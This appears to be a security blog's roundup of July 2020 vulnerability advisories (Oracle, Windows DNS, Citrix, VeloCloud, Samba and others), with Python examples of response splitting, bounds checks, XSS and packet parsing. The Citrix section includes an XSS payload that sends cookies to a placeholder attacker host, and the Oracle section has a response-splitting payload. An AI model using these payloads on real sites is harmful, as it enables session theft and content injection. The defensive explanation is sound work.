Oracle CVE-2020-14606 & CVE-2020-14701: it makes interested people want to know more (17-7-2020)

Preface: TCP injection is the addition of a forged TCP packet to an existing TCP session. Injecting meaningful content only works against plaintext sessions (not HTTPS): inside a TLS session the forged bytes fail the record integrity check and the connection is torn down rather than acted on.

About Oracle Critical Patch Update – July 2020: when I opened the related Oracle article, it was amazing how many vulnerability entries it contained, and I had a headache over how to conduct my analysis properly. As usual, Oracle does not disclose the details of each vulnerability; perhaps this is company policy.

In short, I did research and analysis on the SD-WAN topic. As mentioned, the data provided by the vendor is not clear, so my findings below are a summary based on the circumstances that follow. My observation found the following matter close to vulnerability CVE-2020-14606.

The Oracle SD-WAN Edge 8.2 features guide has the following details:
Issue:29989632 (19500) – User Names can now contain several special characters that were previously disallowed: @, /, and \ . (APN 8.1 P1)
Issue:29986230 (15145) – The special characters ‘/’, ‘ \ ‘, and ‘@’ are now permitted in Aware usernames.

Speculation: perhaps the regular expression no longer filters the special character "\" correctly, and a username containing "\" that is reflected into an HTTP response causes HTTP response splitting. Caveat: response splitting needs a CR or LF to reach a response header; a backslash on its own does not terminate a header line, so what matters is whether the relaxed filter also lets control characters through (or backslash escapes such as \r\n that the application later interprets).
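To make the speculation concrete, here is an added example (my own illustration, not Oracle SD-WAN code) of how a username reflected into a response header becomes response splitting, and the check that stops it. The header layout, the cookie name and the attack value are constructed for the demonstration.

```python
"""Added example, not Oracle's code: a reflected username in an HTTP header,
the response-splitting payload it enables, and the control-character check
that prevents it.  Header names and the payload are constructed."""
import re

CRLF = "\r\n"


def build_response_unsafe(username: str) -> bytes:
    """Vulnerable pattern: the username is copied into a response header verbatim.
    A CR/LF inside the value ends the header line early, and whatever follows is
    interpreted as further headers or as a second response."""
    headers = [
        "HTTP/1.1 302 Found",
        f"Set-Cookie: last_user={username}",  # attacker-influenced value
        "Location: /home",
        "Content-Length: 0",
    ]
    return (CRLF.join(headers) + CRLF + CRLF).encode("latin-1")


# Only control characters matter for splitting (CR, LF and NUL in particular).
# '\\', '/' and '@' are ordinary printable bytes and do not break a header.
_HEADER_VALUE_OK = re.compile(r"[\t\x20-\x7e]*")


def build_response_safe(username: str) -> bytes:
    """Hardened: reject any control character before the value reaches a header."""
    if _HEADER_VALUE_OK.fullmatch(username) is None:
        raise ValueError("header value contains control characters")
    return build_response_unsafe(username)


def count_responses(raw: bytes) -> int:
    """Number of HTTP responses a naive client would see in this byte stream."""
    return raw.count(b"HTTP/1.1 ")


def safe_rejects(username: str) -> bool:
    try:
        build_response_safe(username)
    except ValueError:
        return True
    return False


# Constructed attack value: a benign name, an early end of headers, and a
# complete second response carrying script.
INJECTED_BODY = "<script>evil()</script>"
SPLIT_PAYLOAD = (
    "bob" + CRLF + CRLF
    + "HTTP/1.1 200 OK" + CRLF
    + "Content-Type: text/html" + CRLF
    + f"Content-Length: {len(INJECTED_BODY)}" + CRLF + CRLF
    + INJECTED_BODY
)

if __name__ == "__main__":
    print(count_responses(build_response_unsafe("alice")))        # one response
    print(count_responses(build_response_unsafe(SPLIT_PAYLOAD)))  # two responses
    print(count_responses(build_response_safe("dom\\bob@corp")))  # backslash is harmless
    print(safe_rejects(SPLIT_PAYLOAD))                            # CR/LF is rejected
```

The point of the check is that it is defined by what a header may legally contain rather than by a list of "dangerous" characters: allowing "\", "/" and "@" is fine as long as CR, LF and other control bytes stay excluded.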

For the rest of the vulnerabilities, please refer to the link – https://www.oracle.com/security-alerts/cpujul2020verbose.html

Point of view – CVE-2020-1350 Windows DNS Server RCE (14th Jul 2020)

Preface: Perhaps we have ignored DNS server-side design weaknesses so far. They are on the way to impacting the cyber security world.

Background: DNS is a hierarchical client-server protocol. Each domain is served by one or more authoritative DNS servers, so requests for its subdomains are sent to those servers. Replies can also be cached by intermediate resolvers to improve performance.

(CVE-2020-1350) Vulnerability detail: A remote code execution vulnerability exists in Windows Domain Name System servers when they fail to properly handle requests.

Official detail – https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350

Observation: a design weakness in the RDLENGTH bounds check may be what triggers this flaw. If the pointer arithmetic in the check can wrap around (undefined behaviour for pointers in C, silent for unsigned integers), an attacker can circumvent the bounds check and reach a buffer overflow, because the attacker-controlled addrlen is later used in memcpy(addr_out, bufpos, addrlen), potentially allowing code execution. Public analysis of this bug (nicknamed SIGRed) described the root cause as a 16-bit integer overflow in the size calculation for SIG resource records, leading to a heap overflow; the pattern is the same in both readings, a length derived from the packet that escapes its check.
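The following is an added example (mine, not Windows DNS server code) of the bounds-check pattern described above. It first shows the C idiom `bufpos + rdlength > bufend` evaluated with 32-bit unsigned wraparound (simulated in Python by masking), next to the form that compares the length against the space remaining, and then a small resource-record parser that applies that check before any copy. The addresses and the sample record are constructed.

```python
"""Added example, not Windows DNS code: a wrap-prone bounds check versus a
remaining-space check, and an RDLENGTH-checked resource-record parser.
Addresses and the sample packet are constructed for illustration."""
import struct

MASK32 = 0xFFFFFFFF


def flawed_check(bufpos: int, rdlength: int, bufend: int) -> bool:
    """The C idiom `if (bufpos + rdlength > bufend) reject;`, evaluated with
    32-bit unsigned wraparound.  Returns True when the record is accepted."""
    return ((bufpos + rdlength) & MASK32) <= bufend


def safe_check(bufpos: int, rdlength: int, bufend: int) -> bool:
    """Compare the length against the space that remains; the subtraction
    cannot wrap as long as bufpos <= bufend, which is checked first."""
    return bufpos <= bufend and rdlength <= bufend - bufpos


RR_FIXED = 2 + 2 + 2 + 4 + 2   # NAME(compression pointer) TYPE CLASS TTL RDLENGTH


def parse_rr(packet: bytes, offset: int) -> dict:
    """Parse one resource record whose NAME is a 2-byte compression pointer
    (the usual case in answer sections).  RDLENGTH is checked against the
    bytes actually remaining before the rdata is touched."""
    if len(packet) - offset < RR_FIXED:
        raise ValueError("truncated RR header")
    name_ptr, rtype, rclass, ttl, rdlength = struct.unpack_from("!HHHIH", packet, offset)
    if (name_ptr & 0xC000) != 0xC000:
        raise ValueError("expected a compression pointer in NAME")
    rdata_off = offset + RR_FIXED
    remaining = len(packet) - rdata_off
    if rdlength > remaining:
        raise ValueError(f"RDLENGTH {rdlength} exceeds {remaining} remaining bytes")
    return {
        "type": rtype, "class": rclass, "ttl": ttl,
        "rdata": packet[rdata_off:rdata_off + rdlength],
        "next": rdata_off + rdlength,
    }


def make_rr(rdlength: int, rdata: bytes) -> bytes:
    """Constructed A record (TYPE 1, CLASS IN) whose RDLENGTH field is chosen
    independently of the real rdata length, as a malicious packet would."""
    return struct.pack("!HHHIH", 0xC00C, 1, 1, 300, rdlength) + rdata


def rejects(packet: bytes, offset: int = 0) -> bool:
    try:
        parse_rr(packet, offset)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Buffer near the top of a 32-bit address space: the flawed check wraps
    # and accepts a 512-byte record into a 16-byte buffer; the safe one does not.
    print(flawed_check(0xFFFFFF00, 0x200, 0xFFFFFF10), safe_check(0xFFFFFF00, 0x200, 0xFFFFFF10))
    print(parse_rr(make_rr(4, b"\x0a\x00\x00\x01"), 0)["rdata"])
    print(rejects(make_rr(0x0400, b"\x0a\x00\x00\x01")))
```

The parser deliberately never computes an end pointer from the untrusted length; it asks how many bytes are left and compares the length to that, which is the form that cannot be bypassed by wraparound.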

Even if you have a Phoenix shield, everything depends on the endpoint – 14th Jul 2020

Preface: Mobile has 50.13% and desktop has 47.06% (device share, June 2019 – June 2020).

Background: MobileIron helps you simplify the configuration of enterprise settings, including email, Wi-Fi, VPN and more. MobileIron also provides unified endpoint management and enterprise mobility management (EMM) for mobile devices.

Vulnerabilities details: Please refer to url https://www.mobileiron.com/en/blog/mobileiron-security-updates-available

Comment: The official announcement did not provide a root cause for the vulnerability, so we can only use assumptions drawn from popular attack techniques. Apart from the scenario displayed in the attached diagram, an attacker can use malware to carry out the attack. For instance, malware implanted on the endpoint by a phishing attack can read the plaintext derived credentials from flash storage after the software token has been activated, and transmit them to the adversary behind the malware, who can then use them at will on a different machine.

Reflections on the PoC – Aruba ClearPass Policy Manager multiple vulnerabilities (13th Jul 2020)

Preface: Wi-Fi has grown from a small group of access points in its early phase to enterprise infrastructure today. Even Industry 4.0 and industrial systems, especially ICS and IACS, now carry its footprint.

Background: Aruba’s ClearPass Policy Manager, part of the Aruba 360 Secure Fabric, provides role- and device-based secure network access control for IoT, BYOD, corporate devices, as well as employees, contractors and guests across any multivendor wired, wireless and VPN infrastructure.

About the subject: The official announcement was released on 2nd June 2020 – https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2020-005.txt

However, the details of the PoC were only released two days ago. The PoC requires the C preprocessor and the interface defined in unistd[.]h; in addition, it requires a compiler and re-engineering of the payload library.
But the most important thing is that, to use the PoC code successfully, user authentication is required. However, if the system administrator has not patched CVE-2018-7076 in the past, that benefits the attacker: the vulnerabilities disclosed in June 2020 can then be exploited easily.

Security focus: Citrix security bulletin CTX276688 (9th Jul 2020)

Preface: Typically, North-South traffic is load balanced by ingress devices such as Citrix ADCs, while East-West traffic is load balanced by kube-proxy. Since kube-proxy only provides limited layer-4 load balancing, service owners can use the Citrix ingress controller to achieve sophisticated layer-7 controls for East-West traffic using ingress CPX ADCs.

Security focus: With reference to the Citrix technical article (Security Bulletin CTX276688), there are a total of 11 vulnerabilities. One of them, CVE-2020-8191, is a reflected cross-site scripting (XSS) flaw, and it gives an attacker a way to steal a session cookie (where the cookie is readable from script). That matters for the other vulnerabilities in the bulletin that require user credentials: a stolen session can supply them.

Background: The NSIP address is the IP address at which you access the Citrix ADC appliance for management purposes. The appliance can have only one NSIP, which is also called the management IP address. You must add this IP address when you configure the Citrix ADC for the first time. You cannot remove an NSIP address.

Vulnerability detail: Citrix ADC and Citrix Gateway could allow a remote authenticated attacker to gain elevated privileges on the system, caused by an unspecified flaw. By sending a specially crafted request, an authenticated attacker could exploit this vulnerability to gain elevated privileges. The XSS vulnerability can be used to steal the session cookie that provides that authentication.
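As an added example (my own, not Citrix code, and not how Citrix ADC renders its pages), the block below shows the two controls that decide whether a reflected XSS can steal a session cookie: output encoding at the point of reflection, and the HttpOnly attribute on the cookie. The page template, the cookie name SESSID and the exfiltration payload are constructed; attacker.example is a placeholder host.

```python
"""Added example, not Citrix code: reflected XSS with and without output
encoding, and what injected script can read depending on HttpOnly.
Page layout, cookie name and payload are constructed."""
import html
from http.cookies import SimpleCookie

COOKIE_NAME = "SESSID"   # hypothetical name, not Citrix's


def render_unsafe(query: str) -> str:
    """Vulnerable: the query string is reflected into the page verbatim."""
    return f"<html><body><p>Results for: {query}</p></body></html>"


def render_safe(query: str) -> str:
    """Output-encoded for an HTML text context: < > & \" ' become entities."""
    return f"<html><body><p>Results for: {html.escape(query, quote=True)}</p></body></html>"


def contains_script(page: str) -> bool:
    return "<script" in page.lower()


def session_cookie_header(token: str, httponly: bool) -> str:
    """Set-Cookie value for the session cookie, with or without HttpOnly."""
    c = SimpleCookie()
    c[COOKIE_NAME] = token
    c[COOKIE_NAME]["path"] = "/"
    c[COOKIE_NAME]["secure"] = True
    if httponly:
        c[COOKIE_NAME]["httponly"] = True
    return c.output(header="").strip()


def script_visible_cookies(set_cookie_headers) -> dict:
    """Model of what document.cookie exposes to injected script: every cookie
    that was set without the HttpOnly attribute."""
    visible = {}
    for hdr in set_cookie_headers:
        jar = SimpleCookie()
        jar.load(hdr)
        for name, morsel in jar.items():
            if not morsel["httponly"]:
                visible[name] = morsel.value
    return visible


# Constructed reflected-XSS payload: ship document.cookie to the attacker.
PAYLOAD = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"


def stolen_cookies(query: str, httponly: bool, renderer=render_unsafe) -> dict:
    """What the attacker obtains: nothing unless the page reflects the script
    AND the session cookie is readable from script."""
    page = renderer(query)
    if not contains_script(page):
        return {}
    return script_visible_cookies([session_cookie_header("tok123", httponly)])


if __name__ == "__main__":
    print(stolen_cookies(PAYLOAD, httponly=False))                      # cookie leaks
    print(stolen_cookies(PAYLOAD, httponly=True))                       # nothing readable
    print(stolen_cookies(PAYLOAD, httponly=False, renderer=render_safe))  # no script runs
```

Either control alone closes the cookie-theft path shown here; encoding removes the script, HttpOnly removes the cookie from what script can read. Note that HttpOnly does not stop an XSS from issuing authenticated requests from inside the victim's browser, so it reduces the impact rather than the vulnerability.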

Official announcement – https://support.citrix.com/article/CTX276688

VMware release security update for VeloCloud – 7th Jul 2020

Background: The VMware SD-WAN Orchestrator provides centralized, enterprise-wide installation, configuration and real-time monitoring, in addition to orchestrating the data flow through the cloud network.

Technical highlight – The VeloCloud Orchestrator (VCO) stores flow statistics at high resolution to provide visibility and troubleshooting capability.
By default, a maximum of one million flows are rolled up per edge per day, which averages out to approximately 3,500 flows per 5-minute push (1,000,000 flows over 288 pushes).

Vulnerability details: In release 3.3.0, the VeloCloud Orchestrator (VCO) stores only high-resolution flow statistics, to provide visibility and troubleshooting capability. In release 3.3.2, VCO supports retention of flow statistics for up to one year by rolling up the flow statistics of every edge on a daily basis. So the VeloCloud Orchestrator sits in front of a MySQL server, and that is where the design weakness lies: the original design does not apply correct input validation to values placed into SQL queries, which allows blind SQL injection.

Impact: an attacker can inject crafted SQL queries and obtain data to which they are not privileged.

Official announcement – https://www.vmware.com/security/advisories/VMSA-2020-0016.html

Bootstrap modal forms capable of live add, edit and delete of DataTables records – stay alert (7th Jul 2020)

Preface: Bootstrap modal forms are displayed-on-action pop-up forms used for gathering data from website visitors and for registering or logging in users.

Background: PHPZAG[.]COM is a programming blog that publishes practical and useful tutorials for programmers and web developers.

Solution formulated by PHPZAG – Live Add, Edit and Delete DataTables Records with Ajax, PHP & MySQL:
Step 1 – Handle the modal form submit using jQuery and make an Ajax request with action addRecord to add new records.
Step 2 – On action addRecord, call the method addRecord() to add new records.
Step 3 – Create the method addRecord() in class Records.php to insert new records into the MySQL database.

The vulnerabilities were found on 19th May 2020, but NVD finally published them on 7th July 2020. The source files can be downloaded from the following URL – https://www.phpzag.com/live-add-edit-delete-datatables-records-with-ajax-php-mysql/

Vulnerability details (line numbers refer to the PHPZAG source file):
CVE-2020-8519 SQL injection in the 'search' parameter
CVE-2020-8520 SQL injection in line 29 with the 'order' and 'column' parameters
CVE-2020-8521 SQL injection in line 35 with the 'start' and 'length' parameters

Cloud service providers remain vigilant – NGINX Controller NATS vulnerability – CVE-2020-5910

Preface: NGINX was written specifically to address the performance limitations of Apache web servers.

Background: In March 2019, NGINX Inc. was acquired by F5 Networks for US$670 million. According to 2020 statistics, NGINX is deployed on 375 million websites and has 1,500 paying customers.

Vulnerability detail: A malicious user with access to the host where NGINX Controller is running may eavesdrop on NATS connections and thereby gain unauthorized access to data stored in the message queue. Please refer to the website for details – https://support.f5.com/csp/article/K59209532

Observation: the possible way to exploit this vulnerability is as follows. Referring to the attached diagram, the design requires the ingress to expose the cluster via a host port and also makes it possible to advertise its public IP addresses. A malicious user with access to the host where NGINX Controller is running can then eavesdrop on the NATS connections between Controller components; if that traffic is neither encrypted nor authenticated, anything published to the queue is readable by such a user.

Remedy: Upgrade NGINX Controller to 3.6.0.

Samba releases security updates – 4th Jul 2020

Preface: A set of unsafe default configurations for LDAP channel binding and LDAP signing exists on Active Directory domain controllers that lets LDAP clients communicate with them without enforcing LDAP channel binding and LDAP signing. This can open Active Directory domain controllers to an elevation of privilege vulnerability, said Microsoft.

Notice: If you are a Samba user, you should remain vigilant and apply the fixes immediately.

CVE-2020-10730
A client combining the ‘ASQ’ and ‘VLV’ LDAP controls can cause a NULL pointer de-reference and further combinations with the LDAP paged_results feature can give a use-after-free in Samba’s AD DC LDAP server.
https://www.samba.org/samba/security/CVE-2020-10730.html

CVE-2020-10745
Parsing and packing of NBT and DNS packets can consume excessive CPU in the AD DC (only)
Compression of replies to NetBIOS over TCP/IP name resolution and DNS packets (which can be supplied as UDP requests) can be abused to consume excessive amounts of CPU on the Samba AD DC (only).
https://www.samba.org/samba/security/CVE-2020-10745.html

CVE-2020-10760
The use of the paged_results or VLV controls against the Global Catalog LDAP server on the AD DC will cause a use-after-free.
https://www.samba.org/samba/security/CVE-2020-10760.html

CVE-2020-14303
The AD DC NBT server in Samba 4.0 will enter a CPU spin and not process further requests once it receives an empty (zero-length) UDP packet on port 137.
https://www.samba.org/samba/security/CVE-2020-14303.html
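As an added example (mine, not Samba's code), the block below shows the two input checks a NetBIOS-NS or DNS UDP parser needs against the failure modes of CVE-2020-14303 and CVE-2020-10745: drop any datagram shorter than the 12-byte header before touching it (so a zero-length packet is one cheap verdict, not a stuck loop), and bound the work done while following name-compression pointers. The dispatch loop shows how every datagram yields a verdict and the loop always advances. The datagrams are constructed; the query is a DNS-style query rather than a first-level-encoded NetBIOS name, since the header and compression rules are the same.

```python
"""Added example, not Samba's code: minimum-length and compression-bounded
parsing for NBT/DNS datagrams.  Sample datagrams are constructed."""
import struct

HEADER_LEN = 12            # ID, FLAGS, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT
MAX_NAME_LEN = 255
MAX_POINTER_HOPS = 16


def parse_header(data: bytes) -> dict:
    """Length check first: an empty or short datagram is dropped, never parsed."""
    if len(data) < HEADER_LEN:
        raise ValueError(f"datagram too short ({len(data)} bytes)")
    ident, flags, qd, an, ns, ar = struct.unpack_from("!HHHHHH", data, 0)
    return {"id": ident, "flags": flags, "qdcount": qd,
            "ancount": an, "nscount": ns, "arcount": ar}


def read_name(data: bytes, offset: int):
    """Decode a (possibly compressed) name starting at offset.  Returns
    (labels, offset just past the name in the original byte stream).
    Bounds against compression abuse: each pointer must point strictly
    backwards (so a chain can never loop), and the hop count and decoded
    length are capped."""
    labels, total_len, hops = [], 0, 0
    pos, end = offset, None
    while True:
        if pos >= len(data):
            raise ValueError("name runs past end of datagram")
        length = data[pos]
        if (length & 0xC0) == 0xC0:                     # compression pointer
            if pos + 1 >= len(data):
                raise ValueError("truncated compression pointer")
            hops += 1
            if hops > MAX_POINTER_HOPS:
                raise ValueError("too many compression pointers")
            if end is None:
                end = pos + 2                           # stream resumes after the first pointer
            target = ((length & 0x3F) << 8) | data[pos + 1]
            if target >= pos:
                raise ValueError("compression pointer does not point backwards")
            pos = target
            continue
        if length & 0xC0:
            raise ValueError("reserved label type")
        if length == 0:                                 # root label: done
            return labels, (end if end is not None else pos + 1)
        if pos + 1 + length > len(data):
            raise ValueError("label runs past end of datagram")
        total_len += length + 1
        if total_len > MAX_NAME_LEN:
            raise ValueError("name too long")
        labels.append(data[pos + 1:pos + 1 + length].decode("ascii", "replace"))
        pos += 1 + length


def parse_questions(data: bytes) -> list:
    hdr = parse_header(data)
    off, questions = HEADER_LEN, []
    for _ in range(hdr["qdcount"]):
        labels, off = read_name(data, off)
        if off + 4 > len(data):
            raise ValueError("truncated question")
        qtype, qclass = struct.unpack_from("!HH", data, off)
        off += 4
        questions.append((".".join(labels), qtype, qclass))
    return questions


def serve(datagrams) -> list:
    """Dispatch loop as a server would run it: every datagram yields a verdict
    and the loop always advances to the next one."""
    verdicts = []
    for d in datagrams:
        try:
            verdicts.append(("ok", parse_questions(d)))
        except ValueError as exc:
            verdicts.append(("dropped", str(exc)))
    return verdicts


# Constructed datagrams: an empty packet, a well-formed query, and a query
# whose name is a compression pointer to itself.
HDR = b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"
EMPTY = b""
GOOD = HDR + b"\x03www\x07example\x03com\x00" + b"\x00\x01\x00\x01"
LOOP = HDR + b"\xc0\x0c" + b"\x00\x01\x00\x01"

if __name__ == "__main__":
    for verdict in serve([EMPTY, GOOD, LOOP]):
        print(verdict)
```

The backwards-only rule is the classic guard against pointer loops; the hop and length caps additionally bound the CPU spent on a single name even when every pointer is legal.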

Reference:
– Dereferencing a pointer means accessing whatever the pointer points to.
– Use-after-free vulnerabilities are a type of memory-corruption flaw that attackers can leverage to execute arbitrary code.

Perhaps the Microsoft Windows Codecs Library remote code execution vulnerability lets an attacker exploit a "write4" primitive. 2nd Jul 2020

Preface: Currently, there are no known workarounds or mitigations for these vulnerabilities. Thankfully, Redmond adds that the flaws have not been publicly disclosed and that there are no known exploits in the wild. The firm credits Trend Micro's Zero Day Initiative for privately disclosing the bugs.

Background:
From a security point of view, attackers keen on bypassing Windows heap protection traditionally relied on reusing generic techniques. However, Microsoft has built heap protection in since the Windows XP SP2 era, and as of today generic heap exploitation approaches are not effective: there is no more easy write4. An attacker instead has to rely on application-specific technique, which means controlling the application's allocation pattern to position data carefully on the heap. The historical methods include multiple write4 primitives using a combination of the Lookaside list and the FreeList.

Microsoft has released security updates to address vulnerabilities in Windows 10.

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1457

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1425